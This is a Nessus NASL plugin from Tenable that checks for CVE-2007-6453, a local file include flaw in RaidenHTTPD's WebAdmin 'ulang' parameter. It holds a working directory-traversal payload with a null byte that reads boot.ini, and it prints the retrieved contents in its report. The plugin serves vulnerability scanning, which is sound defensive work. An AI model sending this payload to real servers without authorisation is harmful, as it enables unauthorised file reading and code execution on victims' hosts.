#
# (C) Tenable Network Security, Inc.
#


  desc = "
Synopsis :

The remote web server contains a PHP script that is susceptible to a
local file include attack. 

Description :

The remote host is running RaidenHTTPD, a web server for Windows. 

The version of RaidenHTTPD installed on the remote host fails to
sanitize user-supplied input to the 'ulang' parameter of the
'/raidenhttpd-admin/workspace.php' script before using it to include
PHP code.  Provided the server's WebAdmin feature has been enabled, an
unauthenticated remote attacker can leverage this issue to view
arbitrary files or to execute arbitrary PHP code on the remote host,
subject to the privileges under which the server operates, which is
SYSTEM by default. 

See also :

http://retrogod.altervista.org/rgod_raidenhttpdudo.html
http://www.securityfocus.com/archive/1/485221/30/0/threaded

Solution :

Reconfigure RaidenHTTP and disable WebAdmin as a work-around. 

Risk factor :

High / CVSS Base Score : 9.3
(CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C)";


if (description)
{
  script_id(29728);
  script_version("$Revision: 1.3 $");

  script_cve_id("CVE-2007-6453");
  script_bugtraq_id(26903);
  script_xref(name:"OSVDB", value:"39228");

  script_name(english:"RaidenHTTPD ulang Parameter File Include Vulnerability");
  script_summary(english:"Tries to read a local file with RaidenHTTPD");

  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


# Unless we're paranoid, make sure the banner indicates it's RaidenHTTPD.
if (report_paranoia < 2)
{
  banner = get_http_banner(port:port);
  if (!banner || "Server: RaidenHTTPD" >!< banner) exit(0);
}


# Try to retrieve a local file.
file = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini";

req = http_get(
  item:string("/raidenhttpd-admin/workspace.php?ulang=", file, "%00"), 
  port:port
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if looks like boot.ini.
if ("[boot loader]" >< res)
{
  contents = res;
  if ("<center>" >< res) contents = strstr(contents, "<center>") - "<center>";
  if ("<table" >< res) contents = contents - strstr(contents, "<table");
  if ("[boot loader]" >!< contents) contents = res;

  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n",
    "Here are the contents of the file '\\boot.ini' that Nessus was able to\n",
    "read from the remote host :\n",
    "\n",
    contents
  );
  security_hole(port:port, data:report);
}
